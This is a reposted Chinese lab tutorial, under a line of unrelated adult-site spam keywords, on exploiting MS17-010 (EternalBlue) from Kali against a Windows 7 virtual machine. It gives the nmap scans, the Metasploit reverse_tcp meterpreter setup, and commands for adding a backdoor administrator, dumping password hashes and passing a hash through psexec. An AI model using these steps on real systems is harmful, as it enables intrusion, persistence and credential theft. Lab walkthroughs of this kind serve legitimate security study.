国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

通過Kali利用永恒之藍漏洞目標主機shell,并進行部分后滲透操作

這篇具有很好參考價值的文章主要介紹了通過Kali利用永恒之藍漏洞目標主機shell,并進行部分后滲透操作。希望對大家有所幫助。如果存在錯誤或未考慮完全的地方,請大家不吝賜教,您也可以點擊"舉報違法"按鈕提交疑問。

環(huán)境說明

機器

ip地址

Kali主機

192.168.231.129

win7靶機

192.168.231.143

一、獲取目標主機的管理員權限

1.使用kali虛擬機作為攻擊機,利用nmap掃描獲取目標的IP地址及漏洞,將兩個機器包括一個攻擊機Kali、win7的網絡連接模式都是NAT,即在一個網段里面,然后進行掃描網段,查看存活主機,下面是兩臺機器的ip地址查看,可以看到兩臺機器在同一個網段內,

kali shell,網絡安全,linux,安全,網絡安全,Powered by 金山文檔
kali shell,網絡安全,linux,安全,網絡安全,Powered by 金山文檔

即網段都在192.168.231中

2.然后可以使用命令:Nmap -v –sP 192.168.231.1/24進行網段掃描,

kali shell,網絡安全,linux,安全,網絡安全,Powered by 金山文檔

可以看到140和143的主機是存活的(因為這里我還開了一臺靶機WindowsXP,該實驗同樣可以在WindowsXP中實現(xiàn),實驗步驟一樣),還有一點發(fā)現(xiàn)就是在網段掃描中不會出現(xiàn)129的出現(xiàn),

kali shell,網絡安全,linux,安全,網絡安全,Powered by 金山文檔

因為129是Kali攻擊機的ip地址,所以不會顯示;

3.然后掃描目標主機的漏洞,使用命令:nmap -v --script=vuln 192.168.231.143(這里包括以后都以win7為例,winXP是同樣的操作),

kali shell,網絡安全,linux,安全,網絡安全,Powered by 金山文檔

可以看到這里有一個ms17-010的漏洞,即我們熟知永恒之藍漏洞,我們就可以利用這個漏洞來獲得靶機的shell,

4.使用命令:msfconsole,進入metasploit工具,

kali shell,網絡安全,linux,安全,網絡安全,Powered by 金山文檔

然后使用search命令,搜索永恒之藍有什么可以利用的部分,search ms17-010,

kali shell,網絡安全,linux,安全,網絡安全,Powered by 金山文檔

可以看到有0-4五個可以利用的漏洞,這里我們使用0棧溢出漏洞,使用use 0即可,

kali shell,網絡安全,linux,安全,網絡安全,Powered by 金山文檔

5.然后它提示我們沒有設置載荷,可以使用set命令來設置載荷,如:

set PAYLOAD windows/x64/meterpreter/reverse_tcp

kali shell,網絡安全,linux,安全,網絡安全,Powered by 金山文檔

6.然后查看攻擊模塊所需要配置的參數(shù):show options,

kali shell,網絡安全,linux,安全,網絡安全,Powered by 金山文檔

7.在這里我們需要配置lhost,rhost,target,

kali shell,網絡安全,linux,安全,網絡安全,Powered by 金山文檔

為了確保參數(shù)都配置好了,我們還是查看一下,

kali shell,網絡安全,linux,安全,網絡安全,Powered by 金山文檔

可以看到該配置的參數(shù)都配置好了,然后就可以進行攻擊了,

8.使用run命令,進行滲透攻擊,

kali shell,網絡安全,linux,安全,網絡安全,Powered by 金山文檔

可以看到我們已經成功滲透進入了win7,并獲取了管理員權限,

9.然后進入win7目標機命令窗口,shell,

kali shell,網絡安全,linux,安全,網絡安全,Powered by 金山文檔

可以看到出現(xiàn)了亂碼,然后我們可以進行調整回正確的顯示,輸入:chcp 65001即可,

kali shell,網絡安全,linux,安全,網絡安全,Powered by 金山文檔

然后我們就可以進行后滲透操作。

二、創(chuàng)建管理員賬戶

1.首先我們在win7的 控制面板->用戶賬戶和家庭安全->用戶賬戶->管理賬戶中可以查看現(xiàn)在已有的賬戶,然后我們進入shell并在目標機創(chuàng)建新的管理員用戶,使用命令net user hacker hacker123 /add

kali shell,網絡安全,linux,安全,網絡安全,Powered by 金山文檔
kali shell,網絡安全,linux,安全,網絡安全,Powered by 金山文檔

2.但在這里我們可以看到,新建的用戶hacker并不是一個管理員用戶,所以還需要進行提權操作,使用命令,net localgroup Administrators hacker /add

kali shell,網絡安全,linux,安全,網絡安全,Powered by 金山文檔
kali shell,網絡安全,linux,安全,網絡安全,Powered by 金山文檔

然后我們可以看到hacker有之前的標準用戶變成了管理員用戶,

三、提取系統(tǒng)用戶和密碼hash值

提取系統(tǒng)用戶名和密碼Hash,使用命令,run post/windows/gather/hashdump

kali shell,網絡安全,linux,安全,網絡安全,Powered by 金山文檔

可以看到這里有剛剛創(chuàng)建的管理員用戶hacker的用戶名和hash密碼,

四、hash重放攻擊

1.所謂重放密碼hash攻擊,就是不再利用該漏洞,直接通過賬戶名和密碼hash值進行攻擊賬戶,從而達到獲取管理員權限的目的。所以我們得退出現(xiàn)有的環(huán)境,不用該漏洞,直接exit,然后再重新進去msf,使用msfconsole,

kali shell,網絡安全,linux,安全,網絡安全,Powered by 金山文檔

2.接著使用命令:use windows/smb/psexec;并進行payload的設置,set PAYLOAD windows/meterpreter/reverse_tcp;然后設置主機和靶機的ip,

kali shell,網絡安全,linux,安全,網絡安全,Powered by 金山文檔

3.在設置賬戶和密碼hash之前要先將win7下的UAC關閉,并將win7重啟,不然會失敗,

kali shell,網絡安全,linux,安全,網絡安全,Powered by 金山文檔

4.設置賬戶,set SMBUser sherry即可,接著就是使用密碼hash進行重放攻擊了,直接使用之前獲取的hash密碼,set SMBPass aad3b435b51404eeaad3b435b51404ee:5f8d3ac1c35a759a467f1d77ff0419a9

kali shell,網絡安全,linux,安全,網絡安全,Powered by 金山文檔

在滲透之前再查看一遍參數(shù)是否全部設置成功,

kali shell,網絡安全,linux,安全,網絡安全,Powered by 金山文檔

5.在全部準備工作完成好之后,直接exploit即可,也可以使用run運行,文章來源地址http://www.zghlxwxcb.cn/news/detail-718026.html

kali shell,網絡安全,linux,安全,網絡安全,Powered by 金山文檔

到了這里,關于通過Kali利用永恒之藍漏洞目標主機shell,并進行部分后滲透操作的文章就介紹完了。如果您還想了解更多內容,請在右上角搜索TOY模板網以前的文章或繼續(xù)瀏覽下面的相關文章,希望大家以后多多支持TOY模板網!

本文來自互聯(lián)網用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務,不擁有所有權,不承擔相關法律責任。如若轉載,請注明出處: 如若內容造成侵權/違法違規(guī)/事實不符,請點擊違法舉報進行投訴反饋,一經查實,立即刪除!

領支付寶紅包贊助服務器費用

相關文章

  • 【網絡安全】MS17-010“永恒之藍”漏洞的利用

    【網絡安全】MS17-010“永恒之藍”漏洞的利用

    導語 最近學期末進行網絡安全實訓,老師要求每個小組選擇一個方向進行研究,本篇將講述“永恒之藍”漏洞的簡單利用。 一、實驗原理 Eternalblue通過TCP端口445和139來利用SMBv1和NBT中的遠程代碼執(zhí)行漏洞,惡意代碼會掃描開放445文件共享端口的Windows機器,電腦只要開機,攻

    2024年02月07日
    瀏覽(18)
  • Windows系統(tǒng)漏洞檢測與漏洞利用以及修復(永恒之藍ms17-010)

    ●環(huán)境: 攻擊機:Linux kali(IP:192.168.107.129) 靶機:Windows 7 Enterprise (x64)(IP:192.168.107.143) 實驗條件:兩臺機子可以相互ping通,并且靶機(無補?。╅_啟了445端口,防火墻是關閉的! ●永恒之藍介紹: 永恒之藍漏洞(MS17-010),它的爆發(fā)源于 WannaCry 勒索病毒的誕生,該病

    2024年02月11日
    瀏覽(33)
  • 淺析ms17_010(永恒之藍)漏洞利用過程及防護措施

    淺析ms17_010(永恒之藍)漏洞利用過程及防護措施

    一、永恒之藍(Wannacry)漏洞簡介 1)一種“蠕蟲式”的勒索病毒軟件,利用windows的SMB漏洞傳播,可以獲取System最高權限; 2)主要對windows服務器、主機有較大影響;黑客利用病毒對電腦重要文件進行加密,索要高比特幣,是一種常見的 “勒索病毒” ; 3)中國部分Windows操作系統(tǒng)

    2024年02月13日
    瀏覽(23)
  • MS17-010漏洞攻擊與防御(利用永恒之藍攻擊Win7系統(tǒng))

    MS17-010漏洞攻擊與防御(利用永恒之藍攻擊Win7系統(tǒng))

    任務1?利用永恒之藍攻擊Win7系統(tǒng) 在Kali終端中輸入命令“msfconsole ”,啟動Metasploit;輸入命令“use auxiliary/scanner/smb/smb_ms17_010”,加載掃描模塊;輸入命令“set RHOSTS 192.168.0.6”,設置需要被掃描的目標主機地址;輸入命令“run”,進行掃描并觀察是否存在該漏洞 ? 輸入命令“

    2024年02月05日
    瀏覽(29)
  • MS17-010永恒之藍漏洞利用,win32安裝,windows 7 32位

    MS17-010永恒之藍漏洞利用,win32安裝,windows 7 32位

    漏洞復現(xiàn):MS17-010 漏洞利用的條件:1.靶機開啟445端口(如果未打開該端口將會攻擊失敗,百度打開445端口) ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?2.關閉防火墻 靶機:windows 7(未知X32位還是X64位) ip:192.168.1.9 攻擊機:kali linux (X64) ip:192.168.1.101 使用工具:meatsploit,nmap 前期準備工作 :

    2024年02月08日
    瀏覽(21)
  • 通過kali工具msfconsole利用ms17-010漏洞獲取靶機shell以及遠程登錄

    通過kali工具msfconsole利用ms17-010漏洞獲取靶機shell以及遠程登錄

    注意:本實驗實在虛擬機中完成,旨在技術交流學習請勿用于任何違法犯罪的活動中;任何未經同意授權的滲透測試均為違法行為; 實驗目的: 使用kali通過msfconsole工具,利用ms17-010漏洞獲取靶機shell,創(chuàng)建賬戶遠程登錄到目標靶機上。 實驗環(huán)境: 虛擬機環(huán)境下 攻擊機:l

    2024年02月11日
    瀏覽(17)
  • Kali--MSF-永恒之藍詳解(復現(xiàn)、演示、遠程、后門、加殼、修復)

    Kali--MSF-永恒之藍詳解(復現(xiàn)、演示、遠程、后門、加殼、修復)

    一、永恒之藍概述 二、SMB協(xié)議 三、準備工作 四、漏洞復現(xiàn) 1、主機發(fā)現(xiàn) 2、端口掃描 3、利用模塊 五、演示功能 1.獲取cmd 2.捕獲屏幕 3.上傳文件 4.下載文件 5.遠程登錄 6.上傳后門 7.免殺加殼 8.運行wannacry 9.清除日志 六、預防方案 1.打開防火墻 2.安裝殺毒軟件 3.禁用445端口?

    2023年04月16日
    瀏覽(27)
  • 永恒之藍漏洞原理及漏洞復現(xiàn)

    永恒之藍漏洞原理及漏洞復現(xiàn)

    摘要 永恒之藍是指2017年4月14日晚,黑客團體Shadow Brokers(影子經紀人)公布一大批網絡攻擊工具,其中包含“永恒之藍”工具,“永恒之藍”利用Windows系統(tǒng)的SMB漏洞可以獲取系統(tǒng)最高權限。5月12日,不法分子通過改造“永恒之藍”制作了wannacry勒索病毒,英國、俄羅斯、整個

    2024年02月03日
    瀏覽(23)
  • MS17010(永恒之藍)漏洞實戰(zhàn)

    MS17010(永恒之藍)漏洞實戰(zhàn)

    曾因苦難多壯志,不教紅塵惑堅心。 使用搜索命令,搜索ms17_010 search ms17_010 搜索網段中主機漏洞 use auxiliary/scanner/smb/smb_ms17_010 照例,show options 看一下配置 設置網段,run運行就行了 使用攻擊模塊 查看所需要的配置show options 開始配置payload、滲透地址、監(jiān)聽地址 開始攻擊輸入

    2024年02月07日
    瀏覽(20)
  • 漏洞復現(xiàn)_CVE-2017-0144 “永恒之藍”漏洞

    漏洞復現(xiàn)_CVE-2017-0144 “永恒之藍”漏洞

    (1)一臺Windows電腦 (可以使用虛擬機代替) 配置是 網絡—右鍵,屬性----高級共享設置----啟用文件和打印機共享 (可以理解為,這樣設置才使其具有了“永恒之藍”漏洞) (2)Metasploit任意平臺 可以是Windows版,可以是kali自帶版 1.何為CVE-2017-0144? ? CVE-2017-0144 既 永恒之藍最

    2024年02月04日
    瀏覽(32)

覺得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請作者喝杯咖啡吧~博客贊助

支付寶掃一掃領取紅包,優(yōu)惠每天領

二維碼1

領取紅包

二維碼2

領紅包